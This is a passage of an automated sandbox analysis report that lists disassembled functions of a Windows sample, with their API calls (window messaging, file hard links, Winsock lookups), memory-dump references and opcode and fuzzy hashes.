                                                                                                • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                                                Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                                                • GetWindowRect.USER32(?,?), ref: 00441722
                                                                                                • PtInRect.USER32(?,?,?), ref: 00441734
                                                                                                • MessageBeep.USER32(00000000), ref: 004417AD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                • String ID:
                                                                                                • API String ID: 1352109105-0
                                                                                                • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                                                • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                                                Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                                                • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                                                • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                • String ID:
                                                                                                • API String ID: 3321077145-0
                                                                                                • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                                                • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                                                                Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                                                • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                                                • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                                                • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                • String ID:
                                                                                                • API String ID: 3058430110-0
                                                                                                • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                                                                • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                                                                Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetParent.USER32(?), ref: 004503C8
                                                                                                • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                                                • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                                                • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Proc$Parent
                                                                                                • String ID:
                                                                                                • API String ID: 2351499541-0
                                                                                                • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                                                • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                                                                Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                                                • TranslateMessage.USER32(?), ref: 00442B01
                                                                                                • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Message$Peek$DispatchTranslate
                                                                                                • String ID:
                                                                                                • API String ID: 1795658109-0
                                                                                                • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                                                • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                                                Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                                                                  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                • GetCaretPos.USER32(?), ref: 004743B2
                                                                                                • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                                                • GetForegroundWindow.USER32 ref: 004743EE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                • String ID:
                                                                                                • API String ID: 2759813231-0
                                                                                                • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                                                • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                                                Function 004494A5 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                                                • _wcslen.LIBCMT ref: 00449519
                                                                                                • _wcslen.LIBCMT ref: 00449526
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend_wcslen$_wcspbrk
                                                                                                • String ID:
                                                                                                • API String ID: 2886238975-0
                                                                                                • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                                • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                                                                • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                                • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                                                                Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __setmode$DebugOutputString_fprintf
                                                                                                • String ID:
                                                                                                • API String ID: 1792727568-0
                                                                                                • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                                                • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                                                • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                                                • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                                                Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Long$AttributesLayered
                                                                                                • String ID:
                                                                                                • API String ID: 2169480361-0
                                                                                                • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                                                • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                                                Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                                                  • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                                                  • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                                                • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                                                • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                                                • String ID: cdecl
                                                                                                • API String ID: 3850814276-3896280584
                                                                                                • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                                                                • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                                                • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                                                                • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                                                Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                                                                • _memmove.LIBCMT ref: 0046D475
                                                                                                • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                                                                • String ID:
                                                                                                • API String ID: 2502553879-0
                                                                                                • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                                • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                                                                • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                                • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                                                                Function 00448C3C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32 ref: 00448C69
                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                                                                • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                                                                • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$LongWindow
                                                                                                • String ID:
                                                                                                • API String ID: 312131281-0
                                                                                                • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                                                • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                                                                Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                                                • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                                                • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLastacceptselect
                                                                                                • String ID:
                                                                                                • API String ID: 385091864-0
                                                                                                • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                                                • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                                                Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                                                Memory Dump Source
